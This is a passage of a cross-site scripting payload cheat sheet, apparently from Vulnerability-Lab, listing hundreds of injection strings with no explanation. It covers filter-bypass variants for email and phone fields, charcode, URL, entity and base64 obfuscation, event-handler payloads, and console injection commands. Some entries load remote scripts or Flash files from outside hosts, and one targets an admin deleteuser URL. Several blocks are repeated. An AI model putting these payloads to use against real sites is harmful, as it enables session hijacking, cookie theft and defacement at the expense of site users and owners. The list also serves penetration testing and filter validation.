src="javascript:document.cookie=true;"> -1<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml> -1<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Cross Site Scripting Strings Restriction Bypass Mail: >"<iframe src=http://vulnerability-lab.com/>@gmail.com >"<script>alert(document.cookie)</script><div style="1@gmail.com >"<script>alert(document.cookie)</script>@gmail.com <iframe src=http://vulnerability-lab.com/>@gmail.com <script>alert(document.cookie)</script><div style="1@gmail.com <script>alert(document.cookie)</script>@gmail.com Cross Site Scripting Strings Restriction Bypass Phone: +49/>"<iframe src=http://vulnerability-lab.com>1337 "><iframe src='' onload=alert('mphone')> <iframe src=http://vulnerability-lab.com>1337+1 Cross Site Scripting Strings Restriction Bypass Obfuscation >“<ScriPt>ALeRt("VlAb")</scriPt> >"<IfRaMe sRc=hTtp://vulnerability-lab.com></IfRaMe> Cross Site Scripting Strings Restriction Bypass String to Charcode <html><body> <button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108, 101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1 10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr om.Char.Code</button></body></html> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</SCRIPT> '';!--"<CrossSiteScripting>=&{()} Cross Site Scripting Strings Restriction Bypass encoded frame url %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F %73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F %73%63%72%69%70%74%3E Cross Site Scripting Strings via Console: set vlan name 1337 <script>alert(document.cookie)</script> set system name <iframe src=http://www.vulnerability-lab.com> set system location "><iframe src=a onload=alert("VL") < set system contact <script>alert('VL')</script> insert <script>alert(document.cookie)</script> add <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'"--> add user <script>alert(document.cookie)</script> <script>alert(document.cookie)</script>@gmail.com add topic <iframe src=http://www.vulnerability-lab.com> add name <script>alert('VL')</script> perl -e 'print "<IMG SRC=java\0script:alert(\"CrossSiteScripting\")>";' > out perl -e 'print "<SCR\0IPT>alert(\"CrossSiteScripting\")</SCR\0IPT>";' > out <!--[if gte IE 4]> <SCRIPT>alert('CrossSiteScripting');</SCRIPT> <![endif]--> Cross Site Scripting Strings on per line validation applications: <IMG SRC = " j a v a s c r i p t : a l e r t ( ' V L A B ' ) " > Cross Site Scripting Strings Embed: <EMBED SRC="http://vulnerability-lab.com/CrossSiteScripting.swf" AllowScriptAccess="always"></EMBED> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> Cross Site Scripting Strings Action Script: <object type="application/x-shockwave-flash" data="http://www.vulnerability-lab.com/hack.swf" width="300" height="300"> <param name="movie" value="http://www.subhohalder.com/xysecteam.swf" /> <param name="quality" value="high" /> <param name="scale" value="noscale" /> <param name="salign" value="LT" /> <param name="allowScriptAccess" value="always" /> <param name="menu" value="false" /> </object> <SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT> <<SCRIPT>alert("CrossSiteScripting");//<</SCRIPT> <SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js?<B> <SCRIPT SRC=//vulnerability-lab.com/.js> <SCRIPT>a=/CrossSiteScripting/ alert(a.source)</SCRIPT> <SCRIPT a=">" SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT> <SCRIPT a=`>` SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT> </TITLE><SCRIPT>alert("CrossSiteScripting");</SCRIPT> <IMG SRC="javascript:alert('CrossSiteScripting');"> <IMG SRC=javascript:alert('CrossSiteScripting')> <IMG SRC=JaVaScRiPt:alert('CrossSiteScripting')> <IMG SRC=javascript:alert(&quot;CrossSiteScripting&quot;)> <IMG SRC=`javascript:alert("RM'CrossSiteScripting'")`> <IMG """><SCRIPT>alert("CrossSiteScripting")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC="jav ascript:alert('CrossSiteScripting');"> <IMG SRC="jav&#x09;ascript:alert('CrossSiteScripting');"> <IMG SRC="jav&#x0A;ascript:alert('CrossSiteScripting');"> <IMG SRC="jav&#x0D;ascript:alert('CrossSiteScripting');"> <IMG SRC=" &#14; javascript:alert('CrossSiteScripting');"> <IMG SRC="javascript:alert('CrossSiteScripting')" <IMG DYNSRC="javascript:alert('CrossSiteScripting')"> <IMG LOWSRC="javascript:alert('CrossSiteScripting')"> <IMG SRC='vbscript:msgbox("CrossSiteScripting")'> <IMG SRC="mocha:[code]"> <IMG SRC="livescript:[code]"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('CrossSiteScripting');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=jAvAsCriPt:aLeRt('CroSsSiteScrIpting');"> <META HTTP-EQUIV="Link" Content="<http://vulnerability-lab.com/CrossSiteScripting.css>; REL=stylesheet"> <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('CrossSiteScripting')&lt;/SCRIPT&gt;"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4- <OBJECT TYPE="text/x-scriptlet" DATA="http://vulnerability-lab.com/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('CrossSiteScripting')></OBJECT> <STYLE>@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';</STYLE> <STYLE>@import'http://vulnerability-lab.com/CrossSiteScripting.css';</STYLE> <STYLE TYPE="text/javascript">alert('CrossSiteScripting');</STYLE> <STYLE>.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}</STYLE><A CLASS=CrossSiteScripting></A> <STYLE type="text/css">BODY{background:url("javascript:alert('CrossSiteScripting')")}</STYLE> <STYLE>li {list-style-image: url("javascript:alert('CrossSiteScripting')");}</STYLE><UL><LI>CrossSiteScripting <STYLE>BODY{-moz-binding:url("http://vulnerability-lab.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}</STYLE> <DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(&#1;javascript:alert('CrossSiteScripting'))"> <DIV STYLE="width: expression(alert('CrossSiteScripting'));"> <LAYER SRC="http://vulnerability-lab.com/script.html"></LAYER> <LINK REL="stylesheet" HREF="javascript:alert('CrossSiteScripting');"> <LINK REL="stylesheet" HREF="http://vulnerability-lab.com/CrossSiteScripting.css"> <BODY BACKGROUND="javascript:alert('CrossSiteScripting')"> <BODY ONLOAD=alert('CrossSiteScripting')> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("CrossSiteScripting")> <iframe src=http://vulnerability-lab.com/index.html < <TABLE BACKGROUND="javascript:alert('CrossSiteScripting')"> <TABLE><TD BACKGROUND="javascript:alert('CrossSiteScripting')"> <BGSOUND SRC="javascript:alert('CrossSiteScripting');"> <BR SIZE="&{alert('CrossSiteScripting')}"> <A HREF="http://server.com/">CrossSiteScripting</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">CrossSiteScripting</A> <A HREF="http://1113982867/">CrossSiteScripting</A> <A HREF="javascript:document.location='http://www.vulnerability-lab.com/'">CrossSiteScripting</A> <BASE HREF="javascript:alert('CrossSiteScripting');//"> \";alert('CrossSiteScripting');// <INPUT TYPE="IMAGE" SRC="javascript:alert('CrossSiteScripting');"> <CrossSiteScripting STYLE="behavior: url(CrossSiteScripting.htc);"> ¼script¾alert(¢CrossSiteScripting¢)¼/script¾ <IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(alert('CrossSiteScripting'))"> <CrossSiteScripting STYLE="CrossSiteScripting:expression(alert('CrossSiteScripting'))"> exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*"); CrossSiteScripting:&#101;x&#x2F;*CrossSiteScripting*//*/*/pression(alert("CrossSiteScripting"))'> a="get"; b="URL(\""; c="javascript:"; d="alert('CrossSiteScripting');\")"; eval(v+l+a+b); <HTML xmlns:CrossSiteScripting> <?import namespace="CrossSiteScripting" implementation="http://ha.ckers.org/CrossSiteScripting.htc"> <CrossSiteScripting:CrossSiteScripting>CrossSiteScripting</CrossSiteScripting:CrossSiteScripting> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('CrossSiteScripting');">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID="CrossSiteScripting"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('CrossSiteScripting')"&gt;</B></I></XML> <SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <XML SRC="CrossSiteScriptingtest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="CrossSiteScripting&lt;SCRIPT DEFER&gt;alert(&quot;CrossSiteScripting&quot;)&lt;/SCRIPT&gt;"> </BODY></HTML> <SCRIPT SRC="http://vulnerability-lab.com/CrossSiteScripting.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'"--> <? echo('<SCR)'; echo('IPT>alert("CrossSiteScripting")</SCRIPT>'); ?> <IMG SRC="http://www.vulnerability-lab.com/file.php?variables=malicious"> Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser <script>[CDATA[prompt(1);]]</script> <div onclick="setTimeout('prompt(9)',1000)"> eval("prompt(3)") "><img src=x onabort=prompt(1)> "><img src=x oncanplay=prompt(1)> "><img src=x oncanplaythrough=prompt(1)> "><img src=x ondurationchange=prompt(1)> "><img src=x onemptied=prompt(1)> "><img src=x onended=prompt(1)> "><img src=x onerror=prompt(1)> "><img src=x onloadeddata=prompt(1)> "><img src=x onloadedmetadata=prompt(1)> "><img src=x onloadstart=prompt(1)> "><img src=x onpause=prompt(1)> "><img src=x onplay=prompt(1)> "><img src=x onplaying=prompt(1)> "><img src=x onprogress=prompt(1)> "><img src=x onratechange=prompt(1)> "><img src=x onseeked=prompt(1)> "><img src=x onseeking=prompt(1)> "><img src=x onstalled=prompt(1)> "><img src=x onsuspend=prompt(1)> "><img src=x ontimeupdate=prompt(1)> "><img src=x onvolumechange=prompt(1)> "><img src=x onwaiting=prompt(1)> "><img src=x onshow=prompt(1)> "><img src=x onclick=prompt(1)> "><img src=x ondblclick=prompt(1)> "><img src=x ondrag=prompt(1)> "><img src=x ondragend=prompt(1)> "><img src=x ondragenter=prompt(1)> "><img src=x ondragleave=prompt(1)> "><img src=x ondragover=prompt(1)> "><img src=x ondragstart=prompt(1)> "><img src=x ondrop=prompt(1)> "><img src=x onmousedown=prompt(1)> "><img src=x onmousemove=prompt(1)> "><img src=x onmouseout=prompt(1)> "><img src=x onmouseover=prompt(1)> "><img src=x onmouseup=prompt(1)> "><img src=x onmousewheel=prompt(1)> "><img src=x onscroll=prompt(1)> "><img src=x onwheel=prompt(1)> "><img src=x onerror=prompt(1)> [Click here](javascript:alert(1)) "></script><svg/onload=alert("XSS")> <iframe src="http://businessinfo.co.uk/labs/xss/xss.swf"></iframe> '|alert('xss')|' +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- #onmouseover=prompt(1) "><img src=x onerror=prompt(1)> <script>alert(1)</script> %3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E &#x3C;&#x69;&#x66;&#x72;&#x61;&#x6D;&#x65;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x74;&#x65;&#x73;&#x74;&#x2E;&#x64;&#x65;&#x3E; &#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#46&#100&#101&#62 PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+ javascript:alert(1) <script> ></SCRIPT> "><img src=x onmousemove=prompt(1)> "><img src=x onmouseout=prompt(1)> "><img src=x onmouseover=prompt(1)> <body onload=prompt(1);> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> <video><source onerror="javascript:alert(1)"> <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)> <body > <textarea autofocus onfocus=confirm(1)> <video><source> <body language=vbsonload=alert-1 </textarea>// <body language=vbsonload=alert-1 // Works with IE8 <command onmouseover ="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command> // Works with IE8 <q/oncut=open()> <iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">. <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="> <object data="data:text/html;base64,PHNjcmlwdD4NCnNldFRpbWVvdXQobXlGdW5jdGlvbiwgMzAwMDApOw0KZnVuY3Rpb24gbXlGdW5jdGlvbigpIHsNCiAgICBhbGVydCgnaG9nYXJ0aCcpOw0KfQ0KPC9zY3JpcHQ+"> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <body > <textarea autofocus onfocus=confirm(1)> <video><source> <body language=vbsonload=alert-1 </textarea>// <body language=vbsonload=alert-1 // Works with IE8 <command onmouseover ="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command> // Works with IE8 <q/oncut=open()> <iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">. <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="> <object data="data:text/html;base64,PHNjcmlwdD4NCnNldFRpbWVvdXQobXlGdW5jdGlvbiwgMzAwMDApOw0KZnVuY3Rpb24gbXlGdW5jdGlvbigpIHsNCiAgICBhbGVydCgnaG9nYXJ0aCcpOw0KfQ0KPC9zY3JpcHQ+"> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>